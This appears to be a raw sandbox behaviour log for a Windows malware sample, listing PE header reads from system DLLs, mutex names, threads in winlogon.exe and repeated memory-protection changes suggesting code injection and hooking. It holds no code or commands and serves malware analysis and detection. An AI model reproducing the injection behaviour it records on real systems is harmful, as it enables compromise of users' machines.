C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 20 BAD667A
C:\WINDOWS\system32\user32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\wininet.dll PositionInformation Offset: 60 success or wait 44 BAD667A
C:\WINDOWS\system32\ws2_32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\advapi32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\crypt32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
C:\WINDOWS\system32\msctf.dll write and read and execute commit 14E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit 15E0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown 71A50000 258048 own pid read write object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit A60000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown 71A90000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit A40000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown 76FB0000 32768 own pid read write object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 1620000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 1620000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 15E0000 299008 own pid execute success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown A80000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 14E0000 299008 own pid execute object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 1420000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown 1520000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit 1520000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit 1520000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit 1520000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit 1520000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit 1520000 77824 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute and extend size image A40000 94208 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute and extend size image A50000 94208 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute and extend size image A50000 94208 own pid readonly image not at base 1 BAE1D35
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute and extend size image A50000 94208 own pid readonly image not at base 1 BAE1D35
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 A306B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM success or wait 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
2296 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 A30639
2252 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
556 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
2008 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
2448 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
2436 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
2568 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
1388 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
284 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
3500 636 7C8106F9 false C:\WINDOWS\system32\winlogon.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
8786 0s success or wait 945 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
2296 636 success or wait 0 A30279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
636 C:\WINDOWS\system32\winlogon.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 1 A305EC
636 C:\WINDOWS\system32\winlogon.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
636 C:\WINDOWS\system32\winlogon.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
636 C:\WINDOWS\system32\winlogon.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
636 C:\WINDOWS\system32\winlogon.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
636 C:\WINDOWS\system32\winlogon.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
636 C:\WINDOWS\system32\winlogon.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
636 C:\WINDOWS\system32\winlogon.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
636 C:\WINDOWS\system32\winlogon.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
636 C:\WINDOWS\system32\winlogon.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 3D949088 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
636 C:\WINDOWS\system32\winlogon.exe BB10D98 2000 page execute and read and write page execute and read and write success or wait 1 BAF138F
636 C:\WINDOWS\system32\winlogon.exe 3D95EE89 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 3D95EE89 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
636 C:\WINDOWS\system32\winlogon.exe BB104E8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13C1
636 C:\WINDOWS\system32\winlogon.exe 3D94FABE 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 3D94FABE 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
636 C:\WINDOWS\system32\winlogon.exe BAF65C8 2000 page execute and read and write page execute and read and write success or wait 1 BAF13F4
636 C:\WINDOWS\system32\winlogon.exe 3D9A608E 2000 page execute and read and write page execute read success or wait 1 BAE95DC
636 C:\WINDOWS\system32\winlogon.exe 3D9A608E 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
636 C:\WINDOWS\system32\winlogon.exe BAFF660 2000 page execute and read and write page execute and read and write success or wait 1 BAF1427
636 C:\WINDOWS\system32\winlogon.exe 3D94D508 2000 page execute and read and write page execute read success or wait 1 BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 42 BAD6959
ProcessorInformation success or wait 41 BAD6959
CurrentTimeZoneInformation success or wait 1 BAE630C
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2019261058
Thread created PID: 636 TID: 2296 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019262748
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019263372
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2019264171
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: A80000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2019266779
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2019269108
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2019272245
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 14E0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2019316513
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 14E0000 Size: 299008 Protection: execute Mapped to pid: own pid object name not found 2019317732
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2019318230
Thread created PID: 636 TID: 2252 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019325505
Thread delayed Time: 0 TID: 8786 success or wait 2019326138
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2019326344
System info queried Type: BasicInformation success or wait 2019326448
System info queried Type: ProcessorInformation success or wait 2019326550
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019326691
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019326992
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019327080
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019327217
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019327303
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019327408
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019327612
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019327698
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019328095
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1420000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019328212
System info queried Type: BasicInformation success or wait 2019328501
System info queried Type: ProcessorInformation success or wait 2019328603
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019329093
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019329200
Thread created PID: 636 TID: 556 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019329754
Thread created PID: 636 TID: 2008 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\winlogon.exe Injected: false success or wait 2019330823
Thread delayed Time: 0 TID: 8786 success or wait 2019331728
Thread delayed Time: 0 TID: 8786 success or wait 2019331873
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019331939
System info queried Type: BasicInformation success or wait 2019332049
System info queried Type: ProcessorInformation success or wait 2019332157
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019332305
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019332617
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019332712
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019332855
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019332948
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019333059
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019333274
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019333367
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019333554
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019333676
System info queried Type: BasicInformation success or wait 2019334627
System info queried Type: ProcessorInformation success or wait 2019334742
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019335178
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019335284
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019335392
System info queried Type: BasicInformation success or wait 2019335495
System info queried Type: ProcessorInformation success or wait 2019335595
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019335716
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019336026
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019336117
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019336255
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019336345
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019336452
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019336659
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019336749
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019336929
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019337046
System info queried Type: BasicInformation success or wait 2019337654
System info queried Type: ProcessorInformation success or wait 2019337757
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019338189
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019338295
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019338403
System info queried Type: BasicInformation success or wait 2019338504
System info queried Type: ProcessorInformation success or wait 2019338604
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2019338747
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019339045
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 4 Value: D0 00 00 00 success or wait 2019339137
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019339279
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 20 Value: 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2019339369
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 2019339477
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019339687
File read Path: C:\WINDOWS\system32\ntdll.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 2019339777
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ntdll.dll success or wait 2019339961
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 1520000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2019340079
System info queried Type: BasicInformation success or wait 2019340363
System info queried Type: ProcessorInformation success or wait 2019340466
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019340893
Memory attributes changed PID: 636 Path: C:\WINDOWS\system32\winlogon.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2019340999
